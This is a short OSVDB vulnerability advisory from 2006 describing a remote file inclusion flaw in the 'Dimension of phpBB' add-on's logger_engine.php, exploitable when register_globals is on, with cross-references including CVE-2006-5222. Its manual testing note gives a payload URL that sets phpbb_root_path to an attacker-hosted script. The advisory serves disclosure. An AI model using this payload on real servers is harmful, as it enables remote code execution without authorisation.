Dimension of phpBB logger_engine.php phpbb_root_path Variable Remote File Inclusion

2006-10-05T07:49:38
ID OSVDB:29532
Type osvdb
Reporter OSVDB
Modified 2006-10-05T07:49:38

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]

References:

Secunia Advisory ID:22287 Related OSVDB ID: 29531 ISS X-Force ID: 29361 Generic Exploit URL: http://milw0rm.com/exploits/2481 FrSIRT Advisory: ADV-2006-3923 CVE-2006-5222 Bugtraq ID: 20367